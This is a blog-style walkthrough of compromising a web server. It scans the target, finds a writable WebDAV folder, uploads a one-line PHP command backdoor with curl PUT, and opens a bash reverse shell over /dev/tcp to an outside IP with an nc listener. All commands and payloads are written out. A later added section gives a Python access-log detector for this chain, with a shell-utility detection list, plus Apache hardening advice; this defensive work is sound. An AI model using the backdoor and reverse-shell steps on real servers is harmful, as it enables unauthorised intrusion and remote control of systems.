PHP Backdoor + Reverse Shell on Vulnerable Website

The goal here is to show one method for examining a public IP address to determine whether it is running any vulnerable services that can be exploited.

Target IP: X.X.X.X (IP address purposely hidden)

First we have to do some basic discovery on our IP to determine what services are running. The nmap command used is: proxychains nmap <ip address> -v -Pn -sT -A

Capture0.1

We can see that the target IP is listening on ports 22 (ssh) and 80 (web). For now, we’ll focus on port 80.

Next we scan the website using nikto, dirb, uniscan and w3af. Nikto didn't really turn up much, but dirb tells us that a folder called test exists. Uniscan also turned up some helpful info, but each tool is different and useful in varying ways depending on what you're trying to accomplish. I recommend trying them all against your target.

Capture1

Now that we know a bit more about our target, we can use curl to glean more useful information about the "test" folder:

proxychains curl -X OPTIONS -v http://X.X.X.X/test/

Capture2

Based on the Allow header in the response to the OPTIONS request on the /test directory, it looks like WebDAV is enabled there. Using "PUT" we may be able to upload a backdoor to this folder.

First, we need to create a new file on our box and add the following line:

<?php echo system($_GET["cmd"]); ?>

Next, we attempt to upload our php backdoor to our target using the following command:

proxychains curl --upload-file /root/Desktop/cmd.php -v --url http://X.X.X.X/test/cmd.php -0 --http1.0

Capture3

We can see that our backdoor was successfully uploaded. Now we can use it to (hopefully) run commands directly on the webserver. For example, requesting the following URL from a web browser will give us a directory listing of /:

X.X.X.X/test/cmd.php?cmd=ls%20/

Capture4

Using curl, we could also upload a bash shell script and then use our backdoor to give us a reverse shell on the webserver. The script file contains the following code:

exec 5<>/dev/tcp/52.37.49.217/443
cat <&5 | while read line; do $line 2>&5 >&5; done

Now we upload it:

Capture6

Now, on our public-facing box, before we can receive the shell, we need to set up a listener on port 443 using the following command:

nc -lvp 443

Capture9

Then, from the website, we run the uploaded script via our backdoor:

Capture8

We should now have our reverse bash shell, as seen below:

Capture10
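From the defender's side, the whole chain above leaves a distinctive trail in the web server's access log: an OPTIONS probe, a PUT of a .php (and later a .sh) file into the WebDAV directory, and then GET requests to that same file carrying a cmd= parameter. The script below is an added example (not part of the original post) that tags those requests and correlates an accepted upload with later backdoor use by the same client. It assumes Apache/nginx combined-format access logs; the sample log lines, IPs and file names are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Combined/common log format (Apache/nginx): client, ident, user, timestamp,
# request line, status, size. Only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)

# Extensions the server would execute, or that an attacker would run through
# a backdoor (assumed list; tune to the server's handler configuration).
EXEC_EXT = (".php", ".phtml", ".phar", ".cgi", ".pl", ".sh")

# Parameter names typically used by one-line command backdoors
# (the backdoor in this post reads $_GET["cmd"]).
SHELL_PARAMS = {"cmd", "exec", "command", "c", "run"}

# A parameter value that starts with, or chains into, a common shell utility.
SHELL_TOKENS = re.compile(
    r"(?:^|[;&|\s])(?:ls|cat|id|whoami|uname|bash|sh|nc|wget|curl|python|perl)"
    r"(?:$|[\s;&|])"
)

# Constructed sample log: one client probing, uploading and using a backdoor,
# and one ordinary client whose PUT of a text file should not alert.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2016:13:55:36 +0000] "OPTIONS /test/ HTTP/1.1" 200 -
203.0.113.10 - - [10/Oct/2016:13:55:40 +0000] "PUT /test/cmd.php HTTP/1.0" 201 290
203.0.113.10 - - [10/Oct/2016:13:56:02 +0000] "GET /test/cmd.php?cmd=ls%20/ HTTP/1.1" 200 512
203.0.113.10 - - [10/Oct/2016:13:57:10 +0000] "PUT /test/shell.sh HTTP/1.0" 201 120
203.0.113.10 - - [10/Oct/2016:13:57:30 +0000] "GET /test/cmd.php?cmd=bash%20shell.sh HTTP/1.1" 200 0
198.51.100.7 - - [10/Oct/2016:14:01:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048
198.51.100.7 - - [10/Oct/2016:14:01:05 +0000] "PUT /test/notes.txt HTTP/1.0" 201 40
"""


def parse_line(line):
    """Return the log fields as a dict, or None for lines that don't parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    url = urlparse(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query)  # percent-decodes values for us
    return rec


def analyze(lines):
    """Tag suspicious requests and correlate uploads with later backdoor use.

    Returns alert dicts in log order, each with the source IP, the request
    and the tags that fired.
    """
    uploaded = defaultdict(set)  # ip -> executable paths it PUT successfully
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = []
        ip, path = rec["ip"], rec["path"]
        # 1) WebDAV write of an executable file that the server accepted.
        if (rec["method"] in ("PUT", "MOVE", "COPY")
                and path.lower().endswith(EXEC_EXT)
                and rec["status"] in (200, 201, 204)):
            tags.append("webdav-upload-executable")
            uploaded[ip].add(path)
        # 2) A shell command carried in a backdoor-style parameter.
        if any(k.lower() in SHELL_PARAMS and any(SHELL_TOKENS.search(v) for v in vals)
               for k, vals in rec["query"].items()):
            tags.append("webshell-command-param")
            # 3) ...aimed at a file this same client uploaded: high confidence.
            if path in uploaded[ip]:
                tags.append("uploaded-file-executed")
        if tags:
            alerts.append({"ip": ip, "method": rec["method"],
                           "target": rec["target"], "tags": tags})
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG.splitlines()):
        print(a["ip"], a["method"], a["target"], ",".join(a["tags"]))
```

Run against a real log with `analyze(open("/var/log/apache2/access.log").readlines())`. The correlation step is what separates noise from an incident: a lone OPTIONS or a PUT of a text file is routine on a WebDAV share, but an accepted PUT of a .php file followed by a request to that file with a command in the query string is the exact sequence shown above. The fix on the server side is to stop the upload being possible at all, for example by restricting write methods on the DAV location with Apache's <LimitExcept GET HEAD OPTIONS PROPFIND> plus Require valid-user, and by serving the upload directory without a PHP handler so an uploaded script is never executed.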

 
